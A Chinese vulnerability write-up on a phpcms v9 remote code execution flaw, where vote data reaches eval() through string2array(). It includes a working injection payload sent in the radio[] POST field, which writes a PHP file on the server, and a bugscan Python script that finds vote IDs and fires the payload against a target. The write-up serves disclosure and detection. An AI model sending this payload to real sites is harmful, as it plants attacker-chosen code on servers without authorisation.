phpcms v9 中 string2array()函数使用了eval函数,在多个地方可能造成代码执行漏洞

/phpsso_server/phpcms/libs/functions/global.func.php

/**

* 将字符串转换为数组

*

* @param    string    $data    字符串

* @return    array    返回数组格式,如果,data为空,则返回空数组

*/

function string2array($data) {

if($data == '''') return array();

eval("\$array = $data;");

return $array;

}

在文件/phpcms/modules/vote/index.php中,我们找到它的执行流程

/**

* 处理投票

*/

public function post(){

$subjectid = intval($_POST[''subjectid'']);

if(!$subjectid)    showmessage(L(''vote_novote''),''blank'');

//当前站点

$siteid = SITEID;

//判断是否已投过票,或者尚未到第二次投票期

$return = $this->check($subjectid);

switch ($return) {

case 0:

  showmessage(L(''vote_voteyes''),"?m=vote&c=index&a=result&subjectid=$subjectid&siteid=$siteid");

  break;

case -1:

  showmessage(L(''vote_voteyes''),"?m=vote&c=index&a=result&subjectid=$subjectid&siteid=$siteid");

  break;

}

if(!is_array($_POST[''radio''])) showmessage(L(''vote_nooption''),''blank'');

    $time = SYS_TIME;

   $data_arr = array();

  foreach($_POST[''radio''] as $radio){  //接收POST传递的radio并转换为$radio数组

  $data_arr[$radio]=''1'';

  }

  $new_data = array2string($data_arr);//转成字符串存入数据库中

  //添加到数据库

$this->vote_data->insert(array(''userid''=>$this->userid,''username''=>$this->username,''subjectid''=>$subjectid,''time''=>$time,''ip''=>$this->ip,''data''=>$new_data));

//把字符串$new_data放到data里面

//查询投票奖励点数,并更新会员点数

$vote_arr = $this->vote->get_one(array(''subjectid''=>$subjectid));

  pc_base::load_app_class(''receipts'',''pay'',0);

receipts::point($vote_arr[''credit''],$this->userid, $this->username, '''',''selfincome'',L(''vote_post_point''));

//更新投票人数

$this->vote->update(array(''votenumber''=>''+=1''),array(''subjectid''=>$subjectid));

showmessage(L(''vote_votesucceed''), "?m=vote&c=index&a=result&subjectid=$subjectid&siteid=$siteid");

}

/**

*

* 投票结果显示

*/

public function result(){

$siteid = SITEID;

$subjectid = abs(intval($_GET[''subjectid'']));

if(!$subjectid)    showmessage(L(''vote_novote''),''blank'');

//取出投票标题

$subject_arr = $this->vote->get_subject($subjectid);

if(!is_array($subject_arr)) showmessage(L(''vote_novote''),''blank'');

extract($subject_arr);

//获取投票选项

$options = $this->vote_option->get_options($subjectid);

//新建一数组用来存新组合数据

        $total = 0;

        $vote_data =array();

$vote_data[''total''] = 0 ;//所有投票选项总数

$vote_data[''votes''] = 0 ;//投票人数

//获取投票结果信息

        $infos = $this->vote_data->select(array(''subjectid''=>$subjectid),''data'');

//循环每个会员的投票记录

foreach($infos as $subjectid_arr) {

extract($subjectid_arr);

$arr = string2array($data);//调用了string2array进入eval函数

foreach($arr as $key => $values){

$vote_data[$key]+=1;

}

$total += array_sum($arr);

$vote_data[''votes'']++ ;

}

$vote_data[''total''] = $total ;

//SEO设置

$SEO = seo(SITEID, '''', $subject, $description, $subject);

   include template(''vote'',''vote_result'');

}

所以执行的过程就是

1.首先找到一个可以投票的id参数subjectid

2.发起投票,post数据

/index.php?m=vote&c=index&a=post&subjectid=xxx&siteid=1

subjectid=1&radio[]=);fputs(fopen(base64_decode(cmVhZG1lLnBocA),w),"vulnerable test");

3.然后我们再查看result,触发string2array函数

/index.php?m=vote&c=index&a=result&subjectid=xxx&siteid=1

4.再看看是否有readme.php文件存在。

附上一个用于bugscan检测脚本

Python

# !/usr/bin/dev python

# -*- coding:utf-8 -*-

import re

import urllib

import urllib2

def get_vote_links(args):

    vul_url = args

    vote_url = ''%sindex.php?m=vote'' % vul_url

    code, head, res, _, _ = curl.curl(vote_url)

    ids = []

    for miter in re.finditer(r''<a href=.*?subjectid=(?P<id>\d+)'', res, re.DOTALL):

        ids.append(miter.group(''id''))

    if len(ids) == 0:

        return None

    return list(set(ids))

def assign(service, args):

    if service == ''phpcms'':

        return True, args

    pass

def audit(args):

    vul_url = args

    ids = get_vote_links(args)

    if ids:

        for i in ids:

            exploit_url = ''%sindex.php?m=vote&c=index&a=post&subjectid=%s&siteid=1'' % (vul_url, i)

            payload = {''subjectid'': 1,

                       ''radio[]'': '');fputs(fopen(base64_decode(YnVnc2Nhbi5waHA=),w),"vulnerable test");''}

            post_data = urllib.urlencode(payload)

            curl.curl(''-d "%s" %s'' % (post_data, exploit_url))

            verify_url = ''%sindex.php?m=vote&c=index&a=result&subjectid=%s&siteid=1'' % (vul_url, i)

            curl.curl(verify_url)

            shell_url = ''%sbugscan.php'' % vul_url

            code, head, res, _, _ = curl.curl(shell_url)

            if code == 200 and ''vulnerable test'' in res:

                security_hole(vul_url)

    pass

if __name__ == "__main__":

    from dummy import *

    audit(assign(''phpcms'', ''http://www.example.com/'')[1])

phpcms前台任意代码执行漏洞(php<5.3)的更多相关文章

  1. Discuz! 6.x/7.x 版本 前台任意代码执行漏洞

    一.漏洞原理: 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致Discuz! 6.x/7.x 全局变量防御绕过漏洞. include/global.fun ...

  2. seacms_6.4.5 前台任意代码执行漏洞分析

    环境搭建 1.下载安装包 下载地址: 链接:https://pan.baidu.com/s/1uw_VnxnvG4GGEae4TRsGGw 密码:cd48 2.常规安装 漏洞复现 poc1: http ...

  3. WordPress wp-includes/functions.php脚本远程任意代码执行漏洞

    漏洞名称: WordPress wp-includes/functions.php脚本远程任意代码执行漏洞 CNNVD编号: CNNVD-201309-166 发布时间: 2013-09-13 更新时 ...

  4. php 168任意代码执行漏洞之php的Complex (curly) syntax

    今天了解了php 168的任意代码执行漏洞,Poc: http://192.168.6.128/pentest/cms/php168/member/post.php?only=1&showHt ...

  5. 20.Ecshop 2.x/3.x SQL注入/任意代码执行漏洞

    Ecshop 2.x/3.x SQL注入/任意代码执行漏洞 影响版本: Ecshop 2.x Ecshop 3.x-3.6.0 漏洞分析: 该漏洞影响ECShop 2.x和3.x版本,是一个典型的“二 ...

  6. 记一次海洋cms任意代码执行漏洞拿shell(url一句话)

    实验环境:海洋CMS6.54(后续版本已该洞已补) 1.后台登录尝试 这个站点是个测试站,站里没什么数据. 进入admin.php,是带验证码的后台登录系统,没有验证码的可以用bp爆破.有验证码的也有 ...

  7. 干货|CVE-2019-11043: PHP-FPM在Nginx特定配置下任意代码执行漏洞分析

    近期,国外安全研究员Andrew Danau,在参加夺旗赛(CTF: Capture the Flag)期间,偶然发现php-fpm组件处理特定请求时存在缺陷:在特定Nginx配置下,特定构造的请求会 ...

  8. 修复Apache Log4j任意代码执行漏洞安全风险通告

    2021年12月10日 0x01漏洞背景 Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具.该工具重写了Log4j框架,并且引入了 ...

  9. 漏洞预警 | Apache Struts2 曝任意代码执行漏洞 (S2-045)

    近日,Apache官方发布Apache Struts 2.3.5–2.3.31版本及2.5–2.5.10版本存在远程代码执行漏洞(CNNVD-201703-152 ,CVE-2017-5638)的紧急 ...

随机推荐

  1. linux 大中括号变量解读

    Linux中的小括号和大括号,${}/$()/()/{}/${var:-string}/${var:=string}/${var:+string}/${var:?string}/${var%patte ...

  2. 翻煎饼_简单模拟_C++

    一.题目描述(懒人可直接跳过看题目概述) 题目来源: SWUST OJ  题目0254 http://acm.swust.edu.cn/problem/0254/ 二.问题概述 给出一列数,每次可将包 ...

  3. 强联通分量(tarjan算法+算法简介)

    题目描述 ›对于一个有向图顶点的子集S,如果在S内任取两个顶点u和v,都能找到一条从u到v的路径,那么就称S是强连通的.如果在强连通的顶点集合S中加入其他任意顶点集合后,它都不再是强连通的,那么就称S ...

  4. CCAction详解

    http://blog.csdn.net/bailongvip/article/details/7895370 转载自雨松MOMO程序研究院 上一章我们了解了CCNode的实现原理,这次我跟大家探讨一 ...

  5. Linux内核之页面换出详解

    kswap线程主要用于页面的定期换出,接下来说说kswap线程的实现 首先kswap线程的初始化时,需要根据物理内存的大小设置一个page_cluster变量的值,这个值表示预读数目 (比如本来只读一 ...

  6. ECShop安装实录

    版本: ecmoban_V2.7.3_UTF8_20150623 来源: 官网 一. 给 C:\Windows\temp目录增加 IIS_Users 完全权限. 二. 安装报错: Warning: d ...

  7. RMQ-ST算法

    1068 : RMQ-ST算法 时间限制:10000ms 单点时限:1000ms 内存限制:256MB 描述 小Hi和小Ho在美国旅行了相当长的一段时间之后,终于准备要回国啦!而在回国之前,他们准备去 ...

  8. 打印PE目录数据信息

    printf("数据目录信息:\n"); PIMAGE_DATA_DIRECTORY MyDataDir; MyDataDir = PIMAGE_DATA_DIRECTORY((& ...

  9. Hmailserver搭建邮件服务器

    Hmailserver安装很简单不需要多说,自己去百度 Hmailserver配置: 输入安装时设置的密码登录Hmailserver 添加域名,如:域名是:mail.abc.com这里添加的时候应该填 ...

  10. sersync+rsync作实时同事

    http://liubao0312.blog.51cto.com/2213529/1677586 配置搞定,参照上面的文章,用时搞一搞就OK. 注意IPTABLES的配置及环境变量 最简陋配置: rs ...